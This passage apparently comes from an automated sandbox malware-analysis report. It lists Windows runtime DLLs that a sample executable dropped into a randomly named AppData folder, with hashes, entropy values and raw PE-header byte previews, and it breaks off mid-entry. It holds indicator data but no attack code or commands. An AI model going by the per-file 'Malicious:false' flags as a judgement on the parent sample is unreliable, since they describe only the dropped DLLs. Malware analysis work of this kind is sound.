                                                                                                  SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.16337963516533
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                                                                  MD5:6F6796D1278670CCE6E2D85199623E27
                                                                                                  SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                                                                  SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                                                                  SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19248
                                                                                                  Entropy (8bit):7.073730829887072
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                                                                  MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                                                                  SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                                                                  SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                                                                  SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19392
                                                                                                  Entropy (8bit):7.082421046253008
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                                                                  MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                                                                  SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                                                                  SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                                                                  SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.1156948849491055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                                                                  MD5:D0289835D97D103BAD0DD7B9637538A1
                                                                                                  SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                                                                  SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                                                                  SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17712
                                                                                                  Entropy (8bit):7.187691342157284
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                                                                  MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                                                                  SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                                                                  SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                                                                  SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17720
                                                                                                  Entropy (8bit):7.19694878324007
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                                                                  MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                                                                  SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                                                                  SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                                                                  SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.137724132900032
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                                                                  MD5:12CC7D8017023EF04EBDD28EF9558305
                                                                                                  SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                                                                  SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                                                                  SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20280
                                                                                                  Entropy (8bit):7.04640581473745
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                                                                  MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                                                                  SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                                                                  SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                                                                  SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.138910839042951
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                                                                  MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                                                                  SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                                                                  SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                                                                  SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19248
                                                                                                  Entropy (8bit):7.072555805949365
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                                                  MD5:19A40AF040BD7ADD901AA967600259D9
                                                                                                  SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                                                  SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                                                  SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18224
                                                                                                  Entropy (8bit):7.17450177544266
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                                                  MD5:BABF80608FD68A09656871EC8597296C
                                                                                                  SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                                                  SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                                                  SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18232
                                                                                                  Entropy (8bit):7.1007227686954275
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                                                                                  MD5:0F079489ABD2B16751CEB7447512A70D
                                                                                                  SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                                                                                  SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                                                                                  SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19256
                                                                                                  Entropy (8bit):7.088693688879585
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                                                                                  MD5:6EA692F862BDEB446E649E4B2893E36F
                                                                                                  SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                                                                                  SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                                                                                  SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22328
                                                                                                  Entropy (8bit):6.929204936143068
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                                                                                  MD5:72E28C902CD947F9A3425B19AC5A64BD
                                                                                                  SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                                                                                  SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                                                                                  SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18736
                                                                                                  Entropy (8bit):7.078409479204304
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                                                                                  MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                                                                                  SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                                                                                  SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                                                                                  SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20280
                                                                                                  Entropy (8bit):7.085387497246545
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                                                                                  MD5:AEC2268601470050E62CB8066DD41A59
                                                                                                  SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                                                                                  SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                                                                                  SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19256
                                                                                                  Entropy (8bit):7.060393359865728
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                                                                                  MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                                                                                  SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                                                                                  SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                                                                                  SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.13172731865352
                                                                                                  Encrypted:false
